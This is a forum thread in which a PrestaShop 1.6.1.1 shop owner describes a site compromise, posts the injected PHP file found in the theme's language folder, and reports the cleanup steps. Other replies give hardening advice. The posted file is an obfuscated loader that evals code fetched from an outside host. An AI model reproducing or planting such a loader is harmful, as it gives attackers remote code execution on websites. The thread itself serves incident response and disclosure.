Prestashop 1.6.1.1 VIRUS delete translation file.

[Kingtonino]

Hi, I have PS 1.6.1.1 and I think I was a victim of viruses. The site no longer has a translation, and the lang folder of my theme (default-bootstrap) automatically deletes the language php file and the index. A new index.php, sitemap.xml, robots.txt and google2ebc7d2288acf467.html are created in the lang folder. The content of index.php is: <?=/****/@/*55555*/null; /******/@/*55555*/error_reporting(0);/****/@/*55555*/null; /******/@/*55555*/eval/******/("?>".file_get_contents("https://jeniferseo.my.id/db.txt"))/* *****/ /*P*/?> Can anyone help me? I would be grateful. A thousand thanks

[przemex]

This is a very old version susceptible to attacks, in such a case I clean the files manually + check the server logs where the attacker got in. Check what files were last modified and if they do not have any additional malicious code added. After cleaning I recommend updating the store to the latest safe version.

[Kingtonino]

I SOLVED IT. I found a hidden module, not installed by me, called SENDINBLUE. This module is not visible on the site, but only with FTP. I solved it like this: 1. Deleted the SENDINBLUE folder, 2. Deleted Scan.php from the root of the site, 3. Deleted the first strings from the index.php file, because they were not present in the index.php of the backup 4. Delete file virus created in lang folder (index.php, sitemap.xml and robots.txt) and Restored the language files located in the theme's lang folder (index.php, it.php, en.php).

Edited October 25 by Kingtonino (see edit history)

[przemex]

Remember that version 1.6 has a security hole easy access to the database it would be good if you used this solution

What to do to keep your shop safe

First of all, make sure that your shop and all your modules are updated to their latest version. This should prevent your shop from being exposed to known and actively exploited SQL injection vulnerabilities.

According to our current understanding of the exploit, attackers might be using MySQL Smarty cache storage features as part of the attack vector. This feature is rarely used and is disabled by default, but it can be enabled remotely by the attacker. Until a patch has been published, we recommend physically disabling this feature in PrestaShop’s code in order to break the attack chain.

To do so, locate the file config/smarty.config.inc.php on your PrestaShop install, and remove lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):

if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') { include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php'; $smarty->caching_type = 'mysql'; }

 

[Kingtonino]

Thanks for info